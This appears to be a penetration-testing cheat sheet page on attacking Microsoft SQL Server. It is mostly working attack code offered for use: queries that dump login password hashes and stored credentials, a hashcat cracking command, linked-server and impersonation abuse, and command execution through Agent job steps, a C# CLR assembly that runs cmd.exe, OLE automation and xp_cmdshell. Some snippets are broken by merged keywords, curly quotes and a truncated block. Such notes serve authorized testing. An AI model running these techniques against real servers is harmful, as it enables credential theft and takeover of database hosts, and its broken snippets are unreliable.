MS SQL

SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output FROMmaster.sys.sql_logins;

Linked Servers

-- query for linked servers
SELECT name, data_source, provider_string, catalogFROM sys.serversWHERE is_linked = 1;

-- Execute via open Query
SELECT *  FROM OPENQUERY([LinkedServerName], 'SELECT * FROM DatabaseName.SchemaName.TableName');

-- Direct query execute
SELECT *  FROM [LinkedServerName].[DatabaseName].[SchemaName].[TableName];

SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output
FROM master.sys.sql_logins;

hashcat -m 1731 password_hash.txt pass --username -O

Proxies

-- check for credentials:
select * from msdb.sys.credentials;
-- check for setup proxies:
select * from msdb.dbo.sysproxies;

Linked Servers:

-- query for proxies
SELECT p.name AS ProxyName, c.name AS CredentialName FROM msdb.dbo.sysproxies p
JOIN sys.credentials c ON p.credential_id = c.credential_id;

Impersonation

-- check for impersonation
SELECT grantee_principal.name AS Grantee,        grantor_principal.name AS Grantor, p.class_desc, p.permission_name, p.state_desc 
FROM sys.database_permissions pJOIN sys.database_principals grantee_principal ON p.grantee_principal_id = grantee_principal.principal_id
JOIN sys.database_principals grantor_principal ON p.grantor_principal_id = grantor_principal.principal_id
WHERE p.type = 'IMPERSONATE';
-- Execute query
EXECUTE AS USER = 'username';
SELECT CURRENT_USER AS ImpersonatedUser;

Code Execution:

Agents:

-- query Agents (Requires SA) 
USE msdb;
GOSELECT j.job_id AS JobID, j.name AS JobName, j.enabled AS IsEnabled, j.description AS JobDescription, j.date_created AS DateCreated, j.date_modified AS DateModified, s.name AS OwnerName, c.name AS CategoryName, j.originating_server AS OriginatingServer
FROM sysjobs j
INNER JOIN syscategories c ON j.category_id = c.category_id
INNER JOIN syslogins s ON j.owner_sid = s.sid
ORDER BY j.name;

-- Add job step 
EXEC msdb.dbo.sp_add_jobstep    
@job_name = N'JobName',    
@step_name = N'Xnjsdf',    
@subsystem = N'PowerShell', -- can also be 
command = N'whoami > C:\Temp\whoami.txt',

Proxies:

-- Stored credentials
select name, create_date, credential_identity as credential, modify_date from msdb.sys.credentials;

-- Add system proxy 
EXEC msdb.dbo.sp_add_proxy @proxy_name = 'proxyName', @credential_name = 'CredentialName', @enabled = 1;

-- System Proxies
SELECT p.proxy_id,p.name AS ProxyName,c.name AS CredentialName,p.enabled FROM msdb.dbo.sysproxies AS p JOIN msdb.sys.credentials AS c ON p.credential_id = c.credential_id;

-- delete proxy
EXEC msdb.dbo.sp_delete_proxy @proxy_name = 'ProxyName';

-- Query What has actions have been assigned to a proxy
USE msdb;
SELECT p.name AS ProxyName, s.subsystem AS SubsystemName FROM dbo.sysproxies p 
JOIN dbo.sysproxysubsystem ps ON p.proxy_id = ps.proxy_id 
JOIN dbo.syssubsystems s ON ps.subsystem_id = s.subsystem_id 
WHERE p.name = N'ProxyName';

-- assign powershell permissions to agent
EXEC msdb.dbo.sp_grant_proxy_to_subsystem    
@proxy_name = N'ProxyName',    
@subsystem_id = 12;
--    1: ActiveScripting (VBScript, JScript)
--    2: CmdExec
--    8: Transact-SQL
--    9: ANSISQL
--    11: SSIS
--    12: PowerShell

-- Add Job Step
EXEC msdb.dbo.sp_add_jobstep    
@job_name = N'JobName',    
@step_name = N'StepName',    
@subsystem = N'CmdExec’,  -- or PowerShell
@command = N'whoami > C:\Temp\whoami.txt',    
@proxy_name = N'ProxyName';  -- Use the created proxy

Common Language Runtime:

-- check 
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- enable CLR
EXEC sp_configure 'clr enabled', 1; RECONFIGURE;

Create DLL in visual studio:

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;
public class StoredProcedures
{    
   [Microsoft.SqlServer.Server.SqlProcedure]    
   public static void RunCmd(string command)    
{        
   Process proc = new Process();        
   proc.StartInfo.FileName = "cmd.exe";        
   proc.StartInfo.Arguments = "/c " + command;        
   proc.StartInfo.UseShellExecute = false;        
   proc.StartInfo.RedirectStandardOutput = true;        
   proc.Start();        
  
   SqlContext.Pipe.Send(proc.StandardOutput.ReadToEnd());        
   
   proc.WaitForExit();        
   proc.Close();    
  }
}

Upload and execute code:

CREATE ASSEMBLY RunCmdAssembly 
FROM 'C:\Path\To\Your\Assembly\RunCmdAssembly.dll'
WITH PERMISSION_SET = EXTERNAL_ACCESS;
CREATE PROCEDURE RunCmd     
   @command NVARCHAR(4000)
AS EXTERNAL NAME RunCmdAssembly.StoredProcedures.RunCmd;

EXEC RunCmd ‘CMD';

Object Linking and Embedding (OLE):

-- check configuration
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- enable OLE
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;

--Execute OLE command
DECLARE @ole INT, @hr INT;
DECLARE @cmd NVARCHAR(4000), @output NVARCHAR(4000);
EXEC @hr = sp_OA Create 'WScript.Shell', @ole OUT;
IF @hr <> 0     
    PRINT 'Error Creating OLE Object’;
SET @cmd = 'cmd /c dir’;
EXEC @hr = sp_OAMethod @ole, 'Exec', NULL, @cmd;
IF @hr <> 0     
    PRINT 'Error Executing Command’; 
EXEC @hr = sp_OADestroy @ole;
IF @hr <> 0     
    PRINT 'Error Destroying OLE Object';

XP_cmdshell:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'dir';

PreviousGPO Exploitation NextgMSA

Last updated 10 months ago